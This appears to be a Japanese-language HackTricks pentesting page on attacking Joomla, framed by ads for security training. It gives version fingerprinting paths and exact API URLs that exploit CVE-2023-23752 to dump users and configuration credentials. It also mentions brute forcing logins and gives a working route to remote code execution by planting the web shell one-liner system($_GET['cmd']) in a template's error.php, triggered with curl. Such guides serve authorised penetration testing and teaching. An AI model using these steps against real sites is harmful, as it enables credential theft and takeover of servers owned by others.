Joomla
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Deepen your expertise in Mobile Security with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
Joomlaは、Joomla、PHP、データベースのバージョンや、Joomlaインストールで使用されているサーバーオペレーティングシステムの内訳など、いくつかの匿名の使用統計を収集します。このデータは、彼らの公開APIを介してクエリできます。
メタを確認する
robots.txt
README.txt
/administrator/manifests/files/joomla.xml でバージョンを確認できます。
/language/en-GB/en-GB.xml でJoomlaのバージョンを取得できます。
plugins/system/cache/cache.xml でおおよそのバージョンを確認できます。
In 80,443 - Pentesting Web MethodologyはCMSスキャナーに関するセクションですで、Joomlaをスキャンできます。
バージョン4.0.0から4.2.7は、認証なしの情報漏洩(CVE-2023-23752)に対して脆弱で、クレデンシャルやその他の情報をダンプします。
ユーザー: http://<host>/api/v1/users?public=true
設定ファイル: http://<host>/api/index.php/v1/config/application?public=true
MSFモジュール: scanner/http/joomla_api_improper_access_checks
またはrubyスクリプト: 51334
このスクリプトを使用して、ログインのブルートフォースを試みることができます。
もし管理者の資格情報を取得できたら、PHPコードのスニペットを追加することでRCEを実行できます。これをテンプレートをカスタマイズすることで行います。
Configuration
の下にある**Templates
をクリック**して、テンプレートメニューを表示します。
テンプレート名をクリックします。Template
列の下にある**protostar
を選択しましょう。これでTemplates: Customise
**ページに移動します。
最後に、ページをクリックしてページソースを表示できます。error.php
ページを選びましょう。以下のようにコード実行を得るためのPHPワンライナーを追加します:
system($_GET['cmd']);
保存して閉じる
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
JoomSploit:Joomlaの脆弱性をXSSからRCEまたはその他の重大な脆弱性に昇格させるスクリプト。詳細はこちらの投稿を確認してください。Joomlaバージョン5.X.X、4.X.X、3.X.Xをサポートし、以下を可能にします:
特権昇格: Joomlaにユーザーを作成します。
(RCE) 組み込みテンプレートの編集: Joomlaの組み込みテンプレートを編集します。
(カスタム) カスタムエクスプロイト: サードパーティのJoomlaプラグイン用のカスタムエクスプロイト。
モバイルセキュリティの専門知識を8kSecアカデミーで深めましょう。自己ペースのコースを通じてiOSとAndroidのセキュリティをマスターし、認定を取得しましょう:
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE) GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)